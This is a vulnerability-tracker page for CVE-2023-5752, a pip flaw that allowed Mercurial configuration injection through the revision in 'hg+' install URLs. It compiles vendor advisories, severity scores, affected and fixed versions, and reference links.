CVE-2023-5752
published 2023-10-25CVE-2023-5752: When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject…
PriorityP415low3.3CVSS 3.1
AVLACLPRLUINSUCNILAN
EPSS
0.48%
37.5th percentile
When installing a package from a Mercurial VCS URL (ie "pip install
hg+...") with pip prior to v23.3, the specified Mercurial revision could
be used to inject arbitrary configuration options to the "hg clone"
call (ie "--config"). Controlling the Mercurial configuration can modify
how and which repository is installed. This vulnerability does not
affect users who aren't installing from Mercurial.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | python-pip | < python-pip 20.3.4-4+deb11u2 (bullseye) | python-pip 20.3.4-4+deb11u2 (bullseye) |
| msrc | azl3_mozjs_102.15.1-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_python3_3.12.0-4_on_azure_linux_3.0 | — | — |
| msrc | azl3_python3_3.12.3-1_on_azure_linux_3.0 | — | — |
| msrc | azl3_tensorflow_2.16.1-9_on_azure_linux_3.0 | — | — |
| msrc | azure_linux_3.0_arm | — | — |
| msrc | azure_linux_3.0_x64 | — | — |
| msrc | cbl2_python-virtualenv_20.26.6-1_on_cbl_mariner_2.0 | — | — |
| msrc | cbl2_python3_3.9.19-13_on_cbl_mariner_2.0 | — | — |
| paloalto | pan-os | — | — |
| pypa | pip | < 23.3 | 23.3 |
| pypa | pip | >= 0 < 23.3 | 23.3 |
CVSS provenance
nvdv3.13.3LOWCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
osv3.3LOW
vendor_debian5.5MEDIUM
vendor_msrc5.5MEDIUM
vendor_redhat5.5MEDIUM
vendor_oracle3.3MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
CVE-2023-5752: When installing a package from a Mercurial VCS URL (ie "pip install
hg+
osv·2023-10-25
CVE-2023-5752 CVE-2023-5752: When installing a package from a Mercurial VCS URL (ie "pip install
hg+
When installing a package from a Mercurial VCS URL (ie "pip install
hg+...") with pip prior to v23.3, the specified Mercurial revision could
be used to inject arbitrary configuration options to the "hg clone"
call (ie "--config"). Controlling the Mercurial configuration can modify
how and which repository is installed. This vulnerability does not
affect users who aren't installing from Mercurial.
OSV
CVE-2023-5752: When installing a package from a Mercurial VCS URL (ie "pip install hg+
osv·2023-10-25·CVSS 3.3
CVE-2023-5752 [LOW] CVE-2023-5752: When installing a package from a Mercurial VCS URL (ie "pip install hg+
When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
GHSA
Command Injection in pip when used with Mercurial
ghsa·2023-10-25
CVE-2023-5752 [MEDIUM] CWE-77 Command Injection in pip when used with Mercurial
Command Injection in pip when used with Mercurial
When installing a package from a Mercurial VCS URL, e.g. `pip install hg+...`, with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the `hg clone` call (e.g. `--config`). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
OSV
Command Injection in pip when used with Mercurial
osv·2023-10-25
CVE-2023-5752 [MEDIUM] Command Injection in pip when used with Mercurial
Command Injection in pip when used with Mercurial
When installing a package from a Mercurial VCS URL, e.g. `pip install hg+...`, with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the `hg clone` call (e.g. `--config`). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
Palo Alto
PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
vendor_paloalto·2025-07-09·CVSS 7.5
CVE-2018-6594 [HIGH] PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS. While it was not determined that these CVEs have any significant impact on PAN-OS, they have been fixed out of an abundance of caution. CVE Summary CVE-2018-6594 This CVE is fixed in PAN-OS 10.2.17, 11.1.11, 11.2.8, 12.1.2, and all later versions of PAN-OS CVE-2018-25032 This CVE is fixed in PAN-OS 10.1.7, 10.2.2, and all later versions of PAN-OS CVE-2019-5827 This CVE is fixed in PAN-OS 11.1.4, and all later versions of PAN-OS. CVE-2019-13750 This CVE is fixed in PAN-OS 11.1.4, and all later versions of PAN-OS. CVE-2019-13751 This CVE is fixed in PAN-OS 11.1.4, and all later versions
Palo Alto
PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
vendor_paloalto·2025-07-09·CVSS 7.5
CVE-2023-38546 [HIGH] PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
PAN-SA-2025-0012 Informational Bulletin: OSS CVEs Fixed in PAN-OS
The Palo Alto Networks Product Security Assurance team has evaluated the following open source software (OSS) CVEs as they relate to PAN-OS. While it was not determined that these CVEs have any significant impact on PAN-OS, they have been fixed out of an abundance of caution. CVE Summary CVE-2018-6594 This CVE is fixed in PAN-OS 10.2.17, 11.1.11, 11.2.8, 12.1.2, and all later versions of PAN-OS CVE-2018-25032 This CVE is fixed in PAN-OS 10.1.7, 10.2.2, and all later versions of PAN-OS CVE-2019-5827 This CVE is fixed in PAN-OS 11.1.4, and all later versions of PAN-OS. CVE-2019-13750 This CVE is fixed in PAN-OS 11.1.4, and all later versions of PAN-OS. CVE-2019-13751 This CVE is fixed in PAN-OS 11.1.4, and all later versions
Oracle
Oracle Oracle PeopleSoft Risk Matrix: Porting (pip) — CVE-2023-5752
vendor_oracle·2024-10-15·CVSS 3.3
CVE-2023-5752 [MEDIUM] Oracle Oracle PeopleSoft Risk Matrix: Porting (pip) — CVE-2023-5752
Oracle Oracle PeopleSoft Risk Matrix: Porting (pip) vulnerability
CVE: CVE-2023-5752
CVSS: 3.3
Protocol: None
Remote exploit: No
Affected versions: Local
Advisory: cpuoct2024 (OCT 2024)
Red Hat
pip: Mercurial configuration injectable in repo revision when installing via pip
vendor_redhat·2023-10-25·CVSS 5.5
CVE-2023-5752 [MEDIUM] CWE-77 pip: Mercurial configuration injectable in repo revision when installing via pip
pip: Mercurial configuration injectable in repo revision when installing via pip
When installing a package from a Mercurial VCS URL (ie "pip install
hg+...") with pip prior to v23.3, the specified Mercurial revision could
be used to inject arbitrary configuration options to the "hg clone"
call (ie "--config"). Controlling the Mercurial configuration can modify
how and which repository is installed. This vulnerability does not
affect users who aren't installing from Mercurial.
A flaw was found in the Python pip package. The pip could allow a local authenticated attacker to bypass security restrictions due to a flaw when installing a package from a Mercurial VCS URL. By sending a specially crafted request, an attacker can inject arbitrary configuration options to the "hg clone" call to mod
Microsoft
Mercurial configuration injectable in repo revision when installing via pip
vendor_msrc·2023-10-10·CVSS 5.5
CVE-2023-5752 [MEDIUM] CWE-77 Mercurial configuration injectable in repo revision when installing via pip
Mercurial configuration injectable in repo revision when installing via pip
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in October 2025. See this blog post for more information. If impact to additional products is identified, we will update the CVE to reflect this.
Mariner: Mariner
PSF: PSF
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Referenc
Debian
CVE-2023-5752: python-pip - When installing a package from a Mercurial VCS URL (ie "pip install hg+...") w...
vendor_debian·2023·CVSS 5.5
CVE-2023-5752 [MEDIUM] CVE-2023-5752: python-pip - When installing a package from a Mercurial VCS URL (ie "pip install hg+...") w...
When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.
Scope: local
bookworm: open
bullseye: resolved (fixed in 20.3.4-4+deb11u2)
forky: resolved (fixed in 23.3+dfsg-1)
sid: resolved (fixed in 23.3+dfsg-1)
trixie: resolved (fixed in 23.3+dfsg-1)
No detection rules found.
No public exploits indexed.
https://github.com/pypa/pip/pull/12306https://lists.fedoraproject.org/archives/list/[email protected]/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U/https://lists.fedoraproject.org/archives/list/[email protected]/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH/https://lists.fedoraproject.org/archives/list/[email protected]/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW/https://lists.fedoraproject.org/archives/list/[email protected]/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E/https://lists.fedoraproject.org/archives/list/[email protected]/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ/https://mail.python.org/archives/list/[email protected]/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL/https://github.com/pypa/pip/pull/12306https://lists.debian.org/debian-lts-announce/2025/10/msg00028.htmlhttps://lists.fedoraproject.org/archives/list/[email protected]/message/622OZXWG72ISQPLM5Y57YCVIMWHD4C3U/https://lists.fedoraproject.org/archives/list/[email protected]/message/65UKKF5LBHEFDCUSPBHUN4IHYX7SRMHH/https://lists.fedoraproject.org/archives/list/[email protected]/message/FXUVMJM25PUAZRQZBF54OFVKTY3MINPW/https://lists.fedoraproject.org/archives/list/[email protected]/message/KFC2SPFG5FLCZBYY2K3T5MFW2D22NG6E/https://lists.fedoraproject.org/archives/list/[email protected]/message/YBSB3SUPQ3VIFYUMHPO3MEQI4BJAXKCZ/https://mail.python.org/archives/list/[email protected]/thread/F4PL35U6X4VVHZ5ILJU3PWUWN7H7LZXL/
2023-10-25
Published